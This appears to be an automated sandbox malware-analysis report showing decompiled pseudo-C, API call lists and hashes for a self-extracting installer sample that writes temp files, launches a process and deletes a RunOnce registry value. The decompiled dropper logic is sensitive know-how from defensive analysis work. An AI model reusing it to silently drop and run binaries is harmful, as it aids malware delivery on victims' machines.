                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00107182
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetCurrentProcessId.KERNEL32 ref: 00107191
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetCurrentThreadId.KERNEL32 ref: 0010719A
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: GetTickCount.KERNEL32 ref: 001071A3
                                                                                                                                                                                                                                                  • Part of subcall function 00107155: QueryPerformanceCounter.KERNEL32(?), ref: 001071B8
                                                                                                                                                                                                                                                • GetStartupInfoW.KERNEL32(?,001072B8,00000058), ref: 00106A7F
                                                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 00106AB4
                                                                                                                                                                                                                                                • _amsg_exit.MSVCRT ref: 00106AC9
                                                                                                                                                                                                                                                • _initterm.MSVCRT ref: 00106B1D
                                                                                                                                                                                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00106B49
                                                                                                                                                                                                                                                • exit.KERNELBASE ref: 00106BBF
                                                                                                                                                                                                                                                • _ismbblead.MSVCRT ref: 00106BDA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836923961-0
                                                                                                                                                                                                                                                • Opcode ID: 76c3c6fc4871575921db7791a229bdfeaa11ee67454a790c03785b1415943e92
                                                                                                                                                                                                                                                • Instruction ID: 3655bcc02b61ed29e623e9619f4bcf31f9e2624eee035c604a4c5a216b1e3a94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76c3c6fc4871575921db7791a229bdfeaa11ee67454a790c03785b1415943e92
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB41E2B1A08325DFEB21AB64DC0476A77E4BB48720F64802AF8C1E36D1CFF448918B90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 631 1058c8-1058d5 632 1058d8-1058dd 631->632 632->632 633 1058df-1058f1 LocalAlloc 632->633 634 1058f3-105901 call 1044b9 633->634 635 105919-105959 call 101680 call 10658a CreateFileA LocalFree 633->635 638 105906-105910 call 106285 634->638 635->638 645 10595b-10596c CloseHandle GetFileAttributesA 635->645 644 105912-105918 638->644 645->638 646 10596e-105970 645->646 646->638 647 105972-10597b 646->647 647->644
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E001058C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				signed char _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				intOrPtr* _t27;
                                                                                                                                                                                                                                                				CHAR* _t33;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t27 = __ecx;
                                                                                                                                                                                                                                                				_t23 = __ecx + 1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t6 =  *_t27;
                                                                                                                                                                                                                                                					_t27 = _t27 + 1;
                                                                                                                                                                                                                                                				} while (_t6 != 0);
                                                                                                                                                                                                                                                				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                                				if(_t20 != 0) {
                                                                                                                                                                                                                                                					E00101680(_t20, _t36, _t33);
                                                                                                                                                                                                                                                					E0010658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                                					_v8 = _t10;
                                                                                                                                                                                                                                                					LocalFree(_t20);
                                                                                                                                                                                                                                                					_t12 = _v8;
                                                                                                                                                                                                                                                					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						CloseHandle(_t12);
                                                                                                                                                                                                                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							 *0x109124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                					 *0x109124 = E00106285();
                                                                                                                                                                                                                                                					_t14 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                                			}














                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001058E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00105534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-188559970
                                                                                                                                                                                                                                                • Opcode ID: 8359cde92b1d1b1bfba43b57cbbc787e7a83e09042f5fec1580d9b82cc50865f
                                                                                                                                                                                                                                                • Instruction ID: ab32c1b6d6d7774ab8d13f0f176c040437e5269e197209b0a88b7290d59e3c57
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8359cde92b1d1b1bfba43b57cbbc787e7a83e09042f5fec1580d9b82cc50865f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 31112271700210ABC7241F7AAC4DA9B7E9EEF46374B104619B6CAD31D1CBF088558AA0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                control_flow_graph 675 103fef-104010 676 104016-10403b CreateProcessA 675->676 677 10410a-10411a call 106ce0 675->677 678 104041-10406e WaitForSingleObject GetExitCodeProcess 676->678 679 1040c4-104101 call 106285 GetLastError FormatMessageA call 1044b9 676->679 682 104070-104077 678->682 683 104091 call 10411b 678->683 691 104106 679->691 682->683 686 104079-10407b 682->686 690 104096-1040b8 CloseHandle * 2 683->690 686->683 689 10407d-104089 686->689 689->683 692 10408b 689->692 693 104108 690->693 694 1040ba-1040c0 690->694 691->693 692->683 693->677 694->693 695 1040c2 694->695 695->691
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E00103FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v524;
                                                                                                                                                                                                                                                				long _v528;
                                                                                                                                                                                                                                                				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t45 = __edx;
                                                                                                                                                                                                                                                				_t20 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                                                                				_t49 = 1;
                                                                                                                                                                                                                                                				_t22 = 0;
                                                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return E00106CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                                					 *0x109124 = E00106285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                                					_t45 = 0x4c4;
                                                                                                                                                                                                                                                					E001044B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					_t49 = 0;
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t22 = _t49;
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                                				_t44 = _v528;
                                                                                                                                                                                                                                                				_t53 =  *0x108a28; // 0x0
                                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                                					_t34 =  *0x109a2c; // 0x0
                                                                                                                                                                                                                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                                							 *0x109a2c = _t44;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E0010411B(_t34, _t44);
                                                                                                                                                                                                                                                				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                                				CloseHandle(_v544);
                                                                                                                                                                                                                                                				if(( *0x109a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                0x00104091
                                                                                                                                                                                                                                                0x0010409c
                                                                                                                                                                                                                                                0x001040a8
                                                                                                                                                                                                                                                0x001040b8
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001040c2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001040c2

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00104033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00104049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 0010405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0010409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 001040A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001040DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001040E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: ee76082e17f8de92ae1e20e965e164e5fd90d9d44a5c559440c9561cfc66b777
                                                                                                                                                                                                                                                • Instruction ID: 630211609fa6b796b54a1e92bae48c1dd709516310d64ef4b00d69740a1b9382
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee76082e17f8de92ae1e20e965e164e5fd90d9d44a5c559440c9561cfc66b777
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB31CEB1640318ABEB209B65DC88FAB777CEB94710F2041A9F6C5E25A1CBF05CC1CB21
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001051E5(void* __eflags) {
                                                                                                                                                                                                                                                				int _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = E0010468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                                					if(E0010468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                                						if(_t5 != 0) {
                                                                                                                                                                                                                                                							_t6 = E001044B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                                							LocalFree(_t28);
                                                                                                                                                                                                                                                							if(_t6 != 6) {
                                                                                                                                                                                                                                                								 *0x109124 = 0x800704c7;
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								return 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *0x109124 = 0;
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t28);
                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E001044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree(_t28);
                                                                                                                                                                                                                                                					 *0x109124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x109124 = E00106285();
                                                                                                                                                                                                                                                				goto L10;
                                                                                                                                                                                                                                                			}







                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00102F4D,?,00000002,00000000), ref: 00105201
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00105250
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                • Opcode ID: b3ab9613f815762ba5d41f4a46534dba2f525b21ceef02dcd1bb82d13b8b9ffd
                                                                                                                                                                                                                                                • Instruction ID: d9a3800b1ad488088bd83af525e4a332a1aaf6395f5fe5b1e6f742ad267481c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3ab9613f815762ba5d41f4a46534dba2f525b21ceef02dcd1bb82d13b8b9ffd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E11EFF1300205FBE3286BB15C99B3B619EEF98390B514029B7C2E65D0EBF98C404664
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                			E001052B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				signed int _t9;
                                                                                                                                                                                                                                                				signed int _t11;
                                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                                				void* _t29;
                                                                                                                                                                                                                                                				CHAR** _t31;
                                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t28 = __edi;
                                                                                                                                                                                                                                                				_t22 = __ecx;
                                                                                                                                                                                                                                                				_t21 = __ebx;
                                                                                                                                                                                                                                                				_t9 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                                				_push(__esi);
                                                                                                                                                                                                                                                				_t31 =  *0x1091e0; // 0x2c18e20
                                                                                                                                                                                                                                                				if(_t31 != 0) {
                                                                                                                                                                                                                                                					_push(__edi);
                                                                                                                                                                                                                                                					do {
                                                                                                                                                                                                                                                						_t29 = _t31;
                                                                                                                                                                                                                                                						if( *0x108a24 == 0 &&  *0x109a30 == 0) {
                                                                                                                                                                                                                                                							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                                							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t31 = _t31[1];
                                                                                                                                                                                                                                                						LocalFree( *_t29);
                                                                                                                                                                                                                                                						LocalFree(_t29);
                                                                                                                                                                                                                                                					} while (_t31 != 0);
                                                                                                                                                                                                                                                					_pop(_t28);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t11 =  *0x108a20; // 0x0
                                                                                                                                                                                                                                                				_pop(_t32);
                                                                                                                                                                                                                                                				if(_t11 != 0 &&  *0x108a24 == 0 &&  *0x109a30 == 0) {
                                                                                                                                                                                                                                                					_push(_t22);
                                                                                                                                                                                                                                                					E00101781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                                					if(( *0x109a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                                						E001065E8( &_v268);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                                					_t22 =  &_v268;
                                                                                                                                                                                                                                                					E00102390( &_v268);
                                                                                                                                                                                                                                                					_t11 =  *0x108a20; // 0x0
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				if( *0x109a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                                					_t11 = E00101FE1(_t22); // executed
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				 *0x108a20 =  *0x108a20 & 0x00000000;
                                                                                                                                                                                                                                                				return E00106CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(02C18E20,00000080,?,00000000), ref: 001052F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(02C18E20), ref: 001052FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02C18E20,?,00000000), ref: 00105305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02C18E20), ref: 0010530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(001011FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00105363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00105334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-3290032183
                                                                                                                                                                                                                                                • Opcode ID: 632f843c7f76a70131795fa7bf1e17390d7ff444a5383a32f5ff8f770ca800ff
                                                                                                                                                                                                                                                • Instruction ID: fc0881c5015b6a600460d4fc3bd14d07d990f2b149c088f6705572d3a331e564
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632f843c7f76a70131795fa7bf1e17390d7ff444a5383a32f5ff8f770ca800ff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0921CA31A04A18DBDB34AB24EC19B6A37A5BB24790F444219F8C25B9E1CFF49CC4CF80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00101FE1(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				if( *0x108530 != 0) {
                                                                                                                                                                                                                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                                					if(_t4 == 0) {
                                                                                                                                                                                                                                                						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                                						return RegCloseKey(_v8);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0010538C,?,?,0010538C), ref: 00102005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(0010538C,wextract_cleanup2,?,?,0010538C), ref: 00102017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(0010538C,?,?,0010538C), ref: 00102020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
